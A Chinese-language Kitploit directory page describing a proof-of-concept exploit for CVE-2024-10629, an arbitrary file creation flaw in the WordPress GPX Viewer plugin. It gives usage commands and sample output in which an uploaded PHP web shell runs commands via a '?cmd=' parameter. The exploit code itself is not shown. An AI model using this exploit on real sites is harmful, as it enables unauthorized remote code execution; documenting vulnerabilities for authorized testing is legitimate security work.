Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-10629 — GPX Viewer <= 2.2.8 - 已认证(订阅者+)任意文件创建 | Kitploit
工具/GitHubGitHub/nxploited/cve-2024-10629
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubnxploited/cve-2024-10629

CVE-2024-10629

GPX Viewer <= 2.2.8 - 已认证(订阅者+)任意文件创建

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🛠️ GPX Viewer 漏洞利用 (CVE-2024-10629)

该仓库包含针对 WordPress 的 GPX Viewer 插件的概念验证漏洞利用代码,该插件存在任意文件创建漏洞(CVE-2024-10629)。该漏洞允许具有订阅者级别及以上访问权限的已认证攻击者在受影响站点的服务器上创建任意文件,从而可能导致远程代码执行。

📝 CVE 详情

  • CVE ID: CVE-2024-10629
  • 发布日期: 2024-11-13
  • 更新日期: 2024-11-13
  • 受影响插件: GPX Viewer <= 2.2.8
  • 漏洞类型: 已认证(订阅者及以上)任意文件创建
  • 评分: 8.8 HIGH
  • 严重性: HIGH
  • 版本: 3.1
  • 向量字符串: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

描述

WordPress 的 GPX Viewer 插件在所有版本(包括 2.2.8)中,由于 gpxv_file_upload() 函数缺少能力检查和文件类型验证,导致存在任意文件创建漏洞。这使具有订阅者级别及以上访问权限的已认证攻击者能够在受影响站点的服务器上创建任意文件,从而使远程代码执行成为可能。

🚀 功能

  • 使用提供的用户名和密码自动登录。
  • 验证 GPX Viewer 插件版本。
  • 向服务器上传 PHP shell。
  • 验证 shell 是否上传成功。
  • 通过上传的 shell 在服务器上执行命令。

📚 使用方法

先决条件

  • Python 3.x
  • requests 库

运行漏洞利用

  1. 克隆仓库:

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-10629/
    cd CVE-2024-10629
    
  2. 安装所需库:

    root@kitploit:~
    pip install requests
    
  3. 运行漏洞利用:

    root@kitploit:~
    python exploit.py -u <target_url> -un <username> -p <password>
    

    将 <target_url>、<username> 和 <password> 替换为相应的值。

示例

root@kitploit:~
python CVE-2024-10629.py -u http://example.com/wordpress -un subscriber -p subscriber_password

输出

  • 脚本将输出插件版本并检查是否存在漏洞。
  • 随后,它将使用提供的凭据登录,并尝试上传 shell。
  • 如果成功,它将验证 shell 上传并执行示例命令(ls)。
root@kitploit:~
[+] WordPress plugin version: 2.2.8
[+] Vulnerable version detected. Proceeding with exploitation...
[+] Logged in successfully.
[+] Shell uploaded. Checking shell...
[+] Shell uploaded successfully.
[+] Shell URL: http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
[+] Command output:
http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
index.php
wp-admin
wp-content
wp-includes
...

示例命令

  • ls = 显示文件
  • uname -a = 显示系统信息

⚠️ 免责声明

此漏洞利用代码仅供教育目的和授权测试使用。未经授权对您不拥有或没有明确测试许可的系统使用此漏洞利用代码是非法且不道德的。本仓库的作者和贡献者不对因使用此漏洞利用代码而造成的任何滥用或损害负责。


作者:Khaled Alenazi (Nxploit)

下载工具